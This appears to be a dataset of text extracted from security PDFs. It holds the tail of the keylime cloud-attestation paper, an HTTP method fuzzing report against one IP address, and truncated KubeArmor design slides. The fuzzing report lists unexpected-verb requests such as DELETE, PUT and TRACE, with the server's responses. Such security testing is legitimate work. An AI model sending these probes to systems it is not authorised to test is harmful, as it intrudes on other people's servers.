collected the physical TPM mea-\nsurements on the same system with a standard (non-Xen)\n15http://ipsec-tools.sourceforge.net/\n16https://openvpn.net/Table 2: Average TPM Operation Latency (ms).\nTPM vTPM Deep quote\nCreate Quote 725 68.5 1390\nCheck Quote 4.64 4.64 5.33\nkernel. We collected both vTPM quote and deep quote mea-\nsurements from a domain running on Xen. As expected, op-\nerations that require interaction with the physical TPM are\nslow. Veri\fcation times, even for deep quotes that include\ntwo RSA signature veri\fcations, are comparatively quick.\n5.2 Key Derivation Protocol\nWe next investigate the CV latency of di\u000berent phases\nof our protocol. In Figures 6 and 7, we show the aver-\naged results of hundreds of trials of the CV with 100 vTPM\nequipped VMs. Each operation includes a full REST in-\nteraction along with the relevant TPM and cryptographic\noperations. We also benchmarked the latency of the pro-\ntocol phases emulating zero latency from the TPM (Null\nTPM). This demonstrates the minimum latency of our CV\nsoftware architecture including the time required to verify\nquotes. The results from the Null TPM trials indicate that\nour network protocol and other processing impose very little\nadditional overhead, even on the relatively modestly pow-\nered Raspberry Pi. The bare metal system had a slightly\nlarger network RTT to the nodes it was verifying causing it\nto have a higher latency than the less powerful m1.large.\nIn Figure 7, we see that latency for the quote retrieval\nprocess is primarily a\u000bected by slow TPM operations and is\ncomparable to prior work [31]. The bootstrapping latency\nis the sum of the latencies for retrieving a quote and provid-\ning V. We \fnd the bootstrapping latency for bare metal and\nvirtual machines to be approximately 793ms and 1555ms re-\nspectively. Virtual nodes doing runtime integrity measure-\nment after bootstrapping bene\ft from much lower latency\nfor vTPM operations. Thus, for a virtual machine with a\nvTPM, keylime can detect integrity violations in as little as\n110ms. The detection latency for a system with a physical\nTPM (781ms for our Xen host) is limited by the speed of\nthe physical TPM at generating quotes.\n5.3 Scalability of Cloud Veri\ufb01er\nNext we establish the maximum rate at which the CV can\nget and check quotes for sustained integrity measurement.\nThis will de\fne the trade-o\u000b between the number of nodes\na single CV can handle and the latency between when an\nintegrity violation occurs and the CV detects it. Since the\nCV quote checking process is a simple round robin check of\neach node, it is easy to parallelize across multiple CVs fur-\nther enhancing scalability. We emulate an arbitrarily large\npopulation of real cloud nodes using a \fxed number test\ncloud nodes. These test cloud nodes emulate a zero latency\nTPM by returning a pre-constructed quote. This way the\ntest nodes appear like a larger population where the CV will\nnever have to block for a lengthy TPM operation to com-\nplete. We found that around 500 zero latency nodes were\nsu\u000ecient to achieve the maximum quote checking rate.\nWe show the average number of quotes veri\fed per second\nfor each of our CV deployment options in Figure 8. Because\nof our process-based worker pool architecture, the primary\nfactor a\u000becting CV scalability is the number of cores and 0 10 20 30 40 50 60\nProvide V Null TPMLatency (ms)Bare Metal\nm1.large\nm1.small\nRaspberry PiFigure 6: Latency of keylime boot-\nstrapping protocol.\n 0 200 400 600 800 1000 1200 1400 1600\nvTPM Quote TPM Quote DeepQuoteLatency (ms)Bare Metal\nm1.large\nm1.small\nRaspberry PiFigure 7: Latency of TPM opera-\ntions in bootstrapping protocol.\n 0 500 1000 1500 2000 2500\nBare Metal m1.large m1.smallRaspberry PiIntegrity Check Rate (quotes/s)Figure 8: Maximum CV quote\nchecking rate of keylime .\n 0 500 1000 1500 2000 2500\n 0 50 100 150 200 250 300Rate (quotes/s)\nNum CV Processes\nFigure 9: Scaling the CV on bare metal\nRAM available. These options provide a variety of choices\nfor deploying the CV. For small cloud tenants a low cost\nVM or inexpensive hardware appliance can easily verify hun-\ndreds of virtual machines with moderate detection latency\n(5-10s). For larger customers, a well-resourced VM or dedi-\ncated hardware can scale to thousands with similar latency.\nFor high security environments, all options can provide sub-\nsecond detection and response time. In future work, we plan\nto implement a priority scheme that allows the tenant to set\nthe rate of veri\fcations for di\u000berent classes of nodes.\nWe next show how our CV architecture can scale by adding\nmore cores and parallelism. We use the bare metal CV and\nshow the average rate of quotes retrieved and checked per\nsecond for 500 test nodes in Figure 9. We see linear speed-\nup until we exhaust the parallelism of the host CPU and\nthe concurrent delay of waiting for many cloud nodes. This\nperformance represents a modest performance improvement\nover Schi\u000bman et al.'s CV which was able to process approx-\nimately 2,000 quotes per second on unspeci\fed hardware [34]\nand a substantial improvement over the Excalibur monitor's\nability to check approximately 633 quotes per second [31].\n5.4 On-Premises Cloud Veri\ufb01er\nFinally, we investigate the performance of the CV when\nhosted at the tenant site away from the cloud. We show\nthe results of our bare metal system's quote veri\fcation\nrate and the bandwidth used for a variety of network de-Table 3: On-Premises bare metal CV verifying 250\nCloud Nodes using 50 CV processes.\nNetwork RTT Rate Bandwidth\n(ms) (quotes/s) (Kbits/s)\n4ms (native) 937 3085\n25ms 613 2017\n50ms 398 1310\n75 ms 282 928.3\n100 ms 208 684.7\n150 ms 141 464.2\nlays we inserted using the comcast17tool in Table 3. These\nresults show that it is possible to run the CV on-premises at\nthe tenant site at the cost of a reduction in quote checking\nrate (and therefore detection latency) and several Mbit/s\nof bandwidth. As such, we recommend the highest perfor-\nmance and lowest cost option is to run the CV in the cloud\nalongside the nodes it will verify.\n6. RELATED WORK\nMany of the challenges that exist in traditional enterprise\nnetworks exist in cloud computing environments as well.\nHowever, there are new challenges and threats including\nshared tenancy and additional reliance on the cloud provider\nto provide a secure foundation [4, 16]. To address some of\nthe challenges, many have proposed trusted computing.\nThe existing speci\fcations for trusted computing rely on\ntrusted hardware, and assume a single owner of the system.\nWith the advent of cloud computing, this assumption is no\nlonger valid. While both the standards community [41] and\nprior work [2] is beginning the process of supporting virtu-\nalization, no end-to-end solution exists. For example, the\ncTPM system [5] assumes a trustworthy cloud provider and\nrequires modi\fcations to trusted computing standards. An-\nother proposal for higher-level validation of services provides\na cryptographically signed audit trail that the hypervisor\nprovides to auditors [12]. The audit trail captures the exe-\ncution of the applications within the virtual machine. This\nproposal does not provide a trusted foundation for the audit\ntrail, and assumes a benign hypervisor. Bleikertz, et al., pro-\npose to use trusted computing to provide cryptographic ser-\nvices for cloud tenants[3]. Their Cryptography-as-a-Service\n(CaaS) system relies on trusted computing, but does not ad-\ndress bootstrapping and requires hypervisor modi\fcations\n17https://github.com/tylertreat/Comcastthat cloud providers are unlikely to support.\nTo address the issues of scalability, several proposals ex-\nist to monitor a cloud infrastructure, and allow for valida-\ntion of the virtual machines controlled by the tenants of the\ncloud [34, 32, 33, 35]. The cloud veri\fer pattern proposed\nby Schi\u000bman, et al., allows a single veri\fer to validate trust\nin the cloud infrastructure, and in turn the cloud veri\fer\n\\vouches\" for the integrity of the cloud nodes. This removes\nthe need for tenants to validate the integrity of the hyper-\nvisor hosts prior to instantiating cloud nodes on them and\navoids the need for nodes to mutually attest each other be-\nfore communicating. The tenant simply provides their in-\ntegrity veri\fcation criteria to the veri\fer, and the veri\fer en-\nsures that the tenant's integrity criteria are satis\fed as part\nof scheduling resources. We utilize the cloud veri\fer pat-\ntern in our work, with some important di\u000berences. First we\nextend it to support secure system bootstrapping for both\nbare metal and virtualized IaaS environments. Second, we\ndo not host any tenant-owned parts of the integrity mea-\nsurement infrastructure in the provider's control as they do.\nThis means that our solution is substantially less invasive\nto the cloud provider's infrastructure (e.g., they required\nnearly 5,000 lines of code to be added to OpenStack) and\nis less prone to compromise. For example, keylime relies\nupon the vTPM integrity measurements inside tenant nodes\nrather than enabling the cloud provider to have explicit vir-\ntual machine introspection (i.e., secret stealing) capabilities.\nExcalibur works to address the scalability problems of\ntrusted computing by leveraging ciphertext policy attribute-\nbased encryption (CPABE) [31]. This encryption scheme\nallows data to be encrypted using keys that represent at-\ntributes of the hypervisor hosts in the IaaS environment\n(e.g., software version, country, zone). Using Excalibur,\nclients can encrypt sensitive data, and be assured that a\nhypervisor will only be given access to the data if the policy\n(the speci\fed set of attributes) is satis\fed. Excalibur only\naddresses trusted bootstrapping for the underlying cloud\nplatform. Therefore, a compromised tenant node would be\nneither detected nor prevented. The Excalibur monitor is\na provider-owned (but attested) component that holds the\nencryption keys that allow a node to boot on a particu-\nlar hypervisor. keylime uses secret sharing to avoid having\nbootstrap key stored (and therefore vulnerable) in any cloud\nsystems except for in the cloud node for which they are in-\ntended.\nThe CloudProxy Tao system provides building blocks to\nestablish trusted services in a layered cloud environment [25].\nThe Tao environment relies on the TPM to establish iden-\ntity and load-time integrity of the nodes and software in\nthe system. Their system does not support system integrity\nmonitoring as they assume that all interactions will only be\nwith other trusted programs running in the Tao environ-\nment. Tao relies upon mutual attestation for all communi-\ncating nodes, but is unable to use TPM-based keys because\nthey are not fast enough to support mutual attestation. Us-\ning the out-of-band CV, we avoid mutual attestation while\nmaintaining rapid detection of integrity violations. The Key\nServer in Tao holds all the secret keys to the system, must\ninteract with hosts to load new applications, and must be\nfully trusted. The Key Server does not o\u000ber compatible de-\nployment options for IaaS environments, especially for small\ntenants who cannot a\u000bord secure facilities or hardware se-\ncurity modules. Furthermore, CloudProxy Tao does not de-tail the secure bootstrapping of their Key Server or Privacy\nCA component for TPM initialization. keylime explicitly\ndescribes bootstrapping of all relevant components and en-\nables multiple realistic secure deployment options for CV\nand registrar hosting.\n7. CONCLUSION\nIn this paper, we have shown that keylime provides a\nfully integrated solution to bootstrap and maintain hardware-\nrooted trust in elastically provisioned IaaS clouds. We have\ndemonstrated that we can bootstrap hardware-rooted cryp-\ntographic identities into both physical and virtual cloud\nnodes, and leverage those identities in higher-level security\nservices, without requiring each service to become trusted\ncomputing-aware. keylime uses a novel key derivation pro-\ntocol that incorporates a tenant's intent to provision new\ncloud resources with integrity measurement. Finally, we\nhave demonstrated and evaluated several deployment sce-\nnarios for our system's critical component, the cloud ver-\ni\fer. keylime can securely derive a key in less than two\nseconds during the provisioning and bootstrapping process,\nand requires as little as 110ms to respond to an integrity\nviolation. Furthermore, we have shown that keylime can\nscale to support thousands of IaaS nodes while maintaining\nquick response to integrity violations.\n8. REFERENCES\n[1] S. Balfe and A. Mohammed. Final fantasy { securing\non-line gaming with trusted computing. In B. Xiao,\nL. Yang, J. Ma, C. Muller-Schloer, and Y. Hua,\neditors, Autonomic and Trusted Computing , volume\n4610 of Lecture Notes in Computer Science , pages\n123{134. Springer Berlin Heidelberg, 2007.\n[2] S. Berger, R. C\u0013 aceres, K. A. Goldman, R. Perez,\nR. Sailer, and L. van Doorn. vtpm: Virtualizing the\ntrusted platform module. In Proceedings of the 15th\nConference on USENIX Security Symposium - Volume\n15, USENIX-SS'06, Berkeley, CA, USA, 2006.\nUSENIX Association.\n[3] S. Bleikertz, S. Bugiel, H. Ideler, S. N \u007furnberger, and\nA.-R. Sadeghi. Client-controlled\ncryptography-as-a-service in the cloud. In\nM. Jacobson, M. Locasto, P. Mohassel, and\nR. Safavi-Naini, editors, Applied Cryptography and\nNetwork Security , volume 7954 of Lecture Notes in\nComputer Science , pages 19{36. Springer Berlin\nHeidelberg, 2013.\n[4] S. Bouchenak, G. Chockler, H. Chockler,\nG. Gheorghe, N. Santos, and A. Shraer. Verifying\ncloud services: Present and future. SIGOPS Oper.\nSyst. Rev. , 47(2):6{19, July 2013.\n[5] C. Chen, H. Raj, S. Saroiu, and A. Wolman. ctpm: A\ncloud tpm for cross-device trusted applications. In\n11th USENIX Symposium on Networked Systems\nDesign and Implementation (NSDI 14) , Seattle, WA,\nApr. 2014. USENIX Association.\n[6] X. Chen, T. Gar\fnkel, E. C. Lewis, P. Subrahmanyam,\nC. A. Waldspurger, D. Boneh, J. Dwoskin, and D. R.\nPorts. Overshadow: A virtualization-based approach\nto retro\ftting protection in commodity operating\nsystems. SIGPLAN Not. , 43(3):2{13, Mar. 2008.[7] J. Criswell, N. Dautenhahn, and V. Adve. Virtual\nghost: Protecting applications from hostile operating\nsystems. SIGARCH Comput. Archit. News ,\n42(1):81{96, Feb. 2014.\n[8] L. Davi, A.-R. Sadeghi, and M. Winandy. Dynamic\nintegrity measurement and attestation: towards\ndefense against return-oriented programming attacks.\nInProceedings of the 2009 ACM workshop on Scalable\ntrusted computing , pages 49{54. ACM, 2009.\n[9] A. Dinaburg, P. Royal, M. Sharif, and W. Lee. Ether:\nMalware analysis via hardware virtualization\nextensions. In Proceedings of the 15th ACM\nConference on Computer and Communications\nSecurity , CCS '08, pages 51{62, New York, NY, USA,\n2008. ACM.\n[10] M. Fioravante and D. D. Graaf. vTPM.\nhttp://xenbits.xen.org/docs/unstable/misc/vtpm.txt,\nNovember 2012.\n[11] D. D. Graaf and Q. Xu. vTPM manager.\nhttp://xenbits.xen.org/docs/unstable/misc/vtpmmgr.txt.\n[12] A. Haeberlen, P. Aditya, R. Rodrigues, and\nP. Druschel. Accountable virtual machines. In\nProceedings of the 9th USENIX Conference on\nOperating Systems Design and Implementation ,\nOSDI'10, pages 1{16, Berkeley, CA, USA, 2010.\nUSENIX Association.\n[13] J. Hennessey, C. Hill, I. Denhardt, V. Venugopal,\nG. Silvis, O. Krieger, and P. Desnoyers. Hardware as a\nservice - enabling dynamic, user-level bare metal\nprovisioning of pools of data center resources. In 2014\nIEEE High Performance Extreme Computing\nConference , Waltham, MA, USA, Sept. 2014.\n[14] P. Hintjens. Curvezmq authentication and encryption\nprotocol. http://rfc.zeromq.org/spec:26, 2013.\n[15] O. S. Hofmann, S. Kim, A. M. Dunn, M. Z. Lee, and\nE. Witchel. Inktag: Secure applications on an\nuntrusted operating system. SIGPLAN Not. ,\n48(4):265{278, Mar. 2013.\n[16] W. Huang, A. Ganjali, B. H. Kim, S. Oh, and D. Lie.\nThe state of public infrastructure-as-a-service cloud\nsecurity. ACM Comput. Surv. , 47(4):68:1{68:31, June\n2015.\n[17] IBM. Ibm and intel bring new security features to the\ncloud. http://www.softlayer.com/press/\nibm-and-intel-bring-new-security-features-cloud,\nSeptember 2004.\n[18] IBM. Software trusted platform module.\nhttp://sourceforge.net/projects/ibmswtpm/, April\n2014.\n[19] Intel. Intel Trusted Boot (tboot).\nhttps://software.intel.com/en-us/articles/\nintel-trusted-execution-technology.\n[20] Intel. Cloud integrity technology. http://www.intel.\ncom/p/en US/support/highlights/sftwr-prod/cit,\n2015.\n[21] T. Jaeger, R. Sailer, and U. Shankar. Prima:\nPolicy-reduced integrity measurement architecture. In\nProceedings of the Eleventh ACM Symposium on\nAccess Control Models and Technologies , SACMAT\n'06, pages 19{28, New York, NY, USA, 2006. ACM.\n[22] B. Kauer. Oslo: Improving the security of trusted\ncomputing. In Proceedings of 16th USENIX SecuritySymposium on USENIX Security Symposium , SS'07,\npages 16:1{16:9, Berkeley, CA, USA, 2007. USENIX\nAssociation.\n[23] R. Kotla, T. Rodehe\u000ber, I. Roy, P. Stuedi, and\nB. Wester. Pasture: Secure o\u000fine data access using\ncommodity trusted hardware. In Presented as part of\nthe 10th USENIX Symposium on Operating Systems\nDesign and Implementation (OSDI 12) , pages\n321{334, Hollywood, CA, 2012. USENIX.\n[24] P. A. Loscocco, P. W. Wilson, J. A. Pendergrass, and\nC. D. McDonell. Linux kernel integrity measurement\nusing contextual inspection. In Proceedings of the 2007\nACM Workshop on Scalable Trusted Computing , STC\n'07, pages 21{29, New York, NY, USA, 2007. ACM.\n[25] J. Manferdelli, T. Roeder, and F. Schneider. The\ncloudproxy tao for trusted computing. Technical\nReport UCB/EECS-2013-135, EECS Department,\nUniversity of California, Berkeley, Jul 2013.\n[26] P. Maniatis, D. Akhawe, K. Fall, E. Shi, S. McCamant,\nand D. Song. Do you know where your data are?:\nSecure data capsules for deployable data protection. In\nProceedings of the 13th USENIX Conference on Hot\nTopics in Operating Systems , HotOS'13, pages 22{22,\nBerkeley, CA, USA, 2011. USENIX Association.\n[27] D. A. McGrew and J. Viega. The galois/counter mode\nof operation (gcm). NIST , 2005.\n[28] T. Moyer, K. Butler, J. Schi\u000bman, P. McDaniel, and\nT. Jaeger. Scalable web content attestation. IEEE\nTransactions on Computers , Mar 2011.\n[29] S. Munetoh. GRUB TCG Patch to Support Trusted\nBoot. http://trousers.sourceforge.net/grub.html.\n[30] R. Sailer, X. Zhang, T. Jaeger, and L. van Doorn.\nDesign and implementation of a tcg-based integrity\nmeasurement architecture. In Proceedings of the 13th\nConference on USENIX Security Symposium - Volume\n13, SSYM'04, pages 16{16, Berkeley, CA, USA, 2004.\nUSENIX Association.\n[31] N. Santos, R. Rodrigues, K. P. Gummadi, and\nS. Saroiu. Policy-sealed data: A new abstraction for\nbuilding trusted cloud services. In Presented as part of\nthe 21st USENIX Security Symposium (USENIX\nSecurity 12) , pages 175{188, Bellevue, WA, 2012.\nUSENIX.\n[32] J. Schi\u000bman, T. Moyer, C. Shal, T. Jaeger, and\nP. McDaniel. Justifying integrity using a virtual\nmachine veri\fer. In Computer Security Applications\nConference, 2009. ACSAC '09. Annual , pages 83{92,\nDec 2009.\n[33] J. Schi\u000bman, T. Moyer, H. Vijayakumar, T. Jaeger,\nand P. McDaniel. Seeding clouds with trust anchors.\nInProceedings of the 2010 ACM Workshop on Cloud\nComputing Security Workshop , CCSW '10, pages\n43{46, New York, NY, USA, 2010. ACM.\n[34] J. Schi\u000bman, Y. Sun, H. Vijayakumar, and T. Jaeger.\nCloud veri\fer: Veri\fable auditing service for iaas\nclouds. In Services (SERVICES), 2013 IEEE Ninth\nWorld Congress on , pages 239{246, June 2013.\n[35] J. Schi\u000bman, H. Vijayakumar, and T. Jaeger.\nVerifying system integrity by proxy. In Proceedings of\nthe 5th International Conference on Trust and\nTrustworthy Computing , TRUST'12, pages 179{200,\nBerlin, Heidelberg, 2012. Springer-Verlag.[36] A. Segall. Using the tpm: Machine authentication and\nattestation. http://opensecuritytraining.info/\nIntroToTrustedComputing \fles/Day2-1-auth-and-att.\npdf, Oct 2012.\n[37] E. G. Sirer, W. de Bruijn, P. Reynolds, A. Shieh,\nK. Walsh, D. Williams, and F. B. Schneider. Logical\nattestation: An authorization architecture for\ntrustworthy computing. In Proceedings of the\nTwenty-Third ACM Symposium on Operating Systems\nPrinciples , SOSP '11, pages 249{264, New York, NY,\nUSA, 2011. ACM.\n[38] Trusted Computing Group. TCG Infrastructure\nWorking Group A CMC Pro\fle for AIK Certi\fcate\nEnrollment. http:\n//www.trustedcomputinggroup.org/\fles/resource\n\fles/738DF0BB-1A4B-B294-D0AF6AF9CC023163/\nIWG CMC Pro\fle Cert Enrollment v1r7.pdf.\n[39] Trusted Computing Group. Trusted Network\nCommunications.\nhttp://www.trustedcomputinggroup.org/developers/\ntrusted network communications.\n[40] Trusted Computing Group. Trusted Platform Module.\nhttp://www.trustedcomputinggroup.org/developers/\ntrusted platform module.\n[41] Trusted Computing Group. Virtualized Platform.\nhttp://www.trustedcomputinggroup.org/developers/\nvirtualized platform." - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 18_43_22.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 4/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:43:22\nTime taken 00:00:08.364\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "KubeArmor", - "file_name": "KubeArmor Design.pdf" - }, - "content": [ - { - "data": "KubeArmor \nInternal Design Agenda \n1.Architectural Overview of KubeArmor \n2.Components in KubeArmor \na. KubeArmor Core Engine \nb. Platform Handler \nc.LSM Enforcer \ni.AppArmor Enforcer \nii.SELinux Enforcer \nd. System Monitor \ne. Logger Architectural Overview of KubeArmor KubeArmor \nHigh-level definition \u21d2 Runtime security enforcement system for containers and VMs \nHigh level point of view Architectural Overview of KubeArmor \nKubernetes \nMultiple VMs \n(KVM Service) \nSelf-managed VM Platform Handler \n(k8s, docker, containerd) \nKVM Agent KubeArmor \nCore Engine AppArmor \nEnforcer \nSELinux \nEnforcer \nSystem \nMonitor \nLogger \n(Feeder) gRPC Service \nkarmor CLI Alerts \nLogs \nKubeArmor Where KubeArmor is? \nKubernetes Multiple VMs Self-managed VM Node Node VM VM VMKubeArmor KubeArmor \nDaemonSet in Kubernetes KubeArmor KubeArmor KubeArmor \nSystemd daemon in a VM Policies \u2192 Kubernetes CR Policies \u2192 KVMService Policies \u2192 KubeArmor \nSystemd daemon in a VM KVMService karmor CLI KubeArmor Components Component initialization KubeArmor Core Engine \nKubeArmor \nPlatform Handler LSM Enforcer Logger System Monitor \nK8s Handler \nDocker Handler \nContainerd Handler AppArmor Enforcer \nSELinux Enforcer gRPC Config \nKVM Agent Platform Handler \nKubernetes \nDocker \nContainerd Node \nPod\nSecurity Policy \nContainer \nContainer \n< Event-driven watcher > NodeName, NodeIP, Labels, Annotations, \u2026 \nPodName, Labels, Annotations, Containers, \u2026 \nPolicyName, PolicySpec, \u2026 \nContainerName, ContainerID, \nAppArmorProfile, PidNS, MntNS, \u2026 \nContainerName, ContainerID, \nAppArmorProfile, PidNS, MntNS, \u2026 \nKVMService Security Policy PolicyName, PolicySpec, \u2026 KubeArmor Core Engine \nEndPoint \nNode Name \nNamespace Name \nEndPoint Name \nLabels \nList of Containers \nList of AppArmor Profiles \nList of SELinux Profiles \nList of Security Policies Node \nPod\nSecurity Policy \nContainer KubeUpdate LSM Enforcer LSM Enforcer: AppArmor \nAppArmor \u2192 File-based security enforcement \nSecurity Policy #1 \nSecurity Policy #2 AppArmor Enforcer AppArmor Profile \nAppArmor LSM \nEndPoint LSM Enforcer: SELinux \nSELinux \u2192 Label-based security enforcement \nSecurity Policy #1 \nSecurity Policy #2 SELinux Enforcer \nKubeArmor Profile \nKubeArmor SELinux Updater \nbash dash cat ls\nbin_t karmor_exec_t bin_tkarmor_block_t \nkarmor_exec_t /bin/dash karmor_block_t /bin/ls \nkarmor SELinux module System Monitor \n(dash) $ ls \nPermission Denied SYS_EXECVE \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nCOMM: ls \nRESULT: -11 SECURITY_BPRM_CHECK \nPidNS: 1234 \nMntNS: 5678 \nPPID: 9 \nPID: 10 \nPATH: /bin/dash \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nPATH: /bin/ls System Monitor (eBPF) \nSystem Monitor SYS_OEPN \u2026 \u2026kprobe, kretprobe, tracepoint Logger (Feeder) \nSystem Monitor \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nCOMM: ls \nRESULT: -11 PidNS: 1234 \nMntNS: 5678 \nPPID: 9 \nPID: 10 \nPATH: /bin/dash \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nPATH: /bin/ls Platform Handler Container EndPoint \nPidNS: 1234 \nMntNS: 5678 \nNamespaceName: XXX \nPodName: YYY \nContainerName: ZZZ NamespaceName: XXX \nPodName: YYY \nList of security policies \nNamespaceName: XXX \nPodName: YYY , ContainerName: 